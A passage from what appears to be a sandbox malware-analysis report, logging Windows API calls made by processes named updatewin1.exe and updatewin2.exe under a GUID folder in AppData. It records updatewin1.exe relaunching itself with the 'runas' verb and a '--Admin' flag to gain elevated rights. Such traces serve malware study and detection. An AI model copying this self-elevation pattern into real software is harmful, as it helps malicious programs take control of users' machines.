returned 0x76e10000 [0077.684] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeCriticalSectionEx") returned 0x76e24d28 [0077.705] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0077.705] GetLastError () returned 0x57 [0077.705] GetProcAddress (hModule=0x76e10000, lpProcName="FlsAlloc") returned 0x76e24f2b [0077.705] GetProcAddress (hModule=0x76e10000, lpProcName="FlsSetValue") returned 0x76e24208 [0077.707] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0077.707] GetLastError () returned 0x57 [0077.707] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0077.707] GetLastError () returned 0x57 [0077.707] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76e10000 [0077.707] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeCriticalSectionEx") returned 0x76e24d28 [0077.708] GetProcessHeap () returned 0x630000 [0077.708] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0077.708] GetLastError () returned 0x57 [0077.708] GetProcAddress (hModule=0x76e10000, lpProcName="FlsAlloc") returned 0x76e24f2b [0077.708] GetLastError () returned 0x57 [0077.708] GetProcAddress (hModule=0x76e10000, lpProcName="FlsGetValue") returned 0x76e21252 [0077.708] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x364) returned 0x65a9e8 [0077.709] SetLastError (dwErrCode=0x57) [0077.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0xc00) returned 0x65ad58 [0077.711] GetStartupInfoW (in: lpStartupInfo=0x18f510 | out: lpStartupInfo=0x18f510*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4033b0, hStdOutput=0x85ebc184, hStdError=0xfffffffe)) [0077.711] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0077.711] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0077.711] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0077.711] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin1.exe\" " [0077.711] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin1.exe\" " [0077.711] IsValidCodePage (CodePage=0x4e4) returned 1 [0077.711] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f530 | out: lpCPInfo=0x18f530) returned 1 [0077.711] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18edf8 | out: lpCPInfo=0x18edf8) returned 1 [0077.711] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0077.711] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb98, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0077.711] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18ee0c | out: lpCharType=0x18ee0c) returned 1 [0077.712] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0077.712] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb48, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā") returned 256 [0077.712] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0077.712] GetLastError () returned 0x57 [0077.712] GetProcAddress (hModule=0x76e10000, lpProcName="LCMapStringEx") returned 0x76ea47f1 [0077.713] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0077.713] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā", cchSrc=256, lpDestStr=0x18e938, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0077.713] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x18f30c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\\d²…Hõ\x18", lpUsedDefaultChar=0x0) returned 256 [0077.713] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0077.713] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb68, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0077.713] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0077.713] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e958, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0077.713] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x18f20c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\\d²…Hõ\x18", lpUsedDefaultChar=0x0) returned 256 [0077.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x65a0d0 [0077.713] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x416cb8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin1.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin1.exe")) returned 0x5f [0077.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0xc8) returned 0x65c160 [0077.713] RtlInitializeSListHead (in: ListHead=0x416bd8 | out: ListHead=0x416bd8) [0077.713] GetLastError () returned 0x0 [0077.714] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0077.714] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x402ae4) returned 0x404e59 [0077.722] GetStartupInfoW (in: lpStartupInfo=0x18f578 | out: lpStartupInfo=0x18f578*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0077.870] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin1.exe\" " [0077.870] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin1.exe\" ", pNumArgs=0x18e580 | out: pNumArgs=0x18e580) returned 0x65d2b8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin1.exe" [0077.870] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x65d388 [0077.871] lstrcpyW (in: lpString1=0x18e5a0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin1.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin1.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin1.exe" [0077.871] PathRemoveFileSpecW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin1.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8") returned 1 [0077.871] lstrcpyW (in: lpString1=0x18eda0, lpString2="--Admin" | out: lpString1="--Admin") returned="--Admin" [0077.871] ShellExecuteExW (in: pExecInfo=0x18e528*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin1.exe", lpParameters="--Admin", lpDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8", nShow=5, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x18e528*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin1.exe", lpParameters="--Admin", lpDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8", nShow=5, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0079.558] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65d388 | out: hHeap=0x630000) returned 1 [0079.559] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0079.559] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0079.560] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65a0d0 | out: hHeap=0x630000) returned 1 [0079.562] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65cab0 | out: hHeap=0x630000) returned 1 [0079.563] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-2", hFile=0x0, dwFlags=0x800) returned 0x0 [0079.563] GetLastError () returned 0x57 [0079.564] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18f56c | out: phModule=0x18f56c) returned 0 [0079.575] ExitProcess (uExitCode=0x0) [0079.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65a9e8 | out: hHeap=0x630000) returned 1 [0079.580] TerminateProcess (hProcess=0xffffffff, uExitCode=0x0) Thread: id = 50 os_tid = 0x954 Thread: id = 52 os_tid = 0x984 Thread: id = 53 os_tid = 0x994 Thread: id = 54 os_tid = 0x9a4 Process: id = "7" image_name = "updatewin2.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin2.exe" page_root = "0x30fc6000" os_pid = "0x914" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x7f0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin2.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 48 os_tid = 0x924 [0077.010] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x9d0f5a00, dwHighDateTime=0x1d5d6b4)) [0077.010] GetCurrentProcessId () returned 0x914 [0077.010] GetCurrentThreadId () returned 0x924 [0077.010] GetTickCount () returned 0x11597ec [0077.010] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=21839122144) returned 1 [0077.117] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin2.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0077.118] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x1f80000 [0077.125] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0077.125] GetProcAddress (hModule=0x76e10000, lpProcName="FlsAlloc") returned 0x76e24f2b [0077.125] GetProcAddress (hModule=0x76e10000, lpProcName="FlsGetValue") returned 0x76e21252 [0077.125] GetProcAddress (hModule=0x76e10000, lpProcName="FlsSetValue") returned 0x76e24208 [0077.125] GetProcAddress (hModule=0x76e10000, lpProcName="FlsFree") returned 0x76e2359f [0077.126] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0077.126] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0077.126] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0077.126] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0077.126] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0077.126] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0077.127] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0077.127] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0077.127] 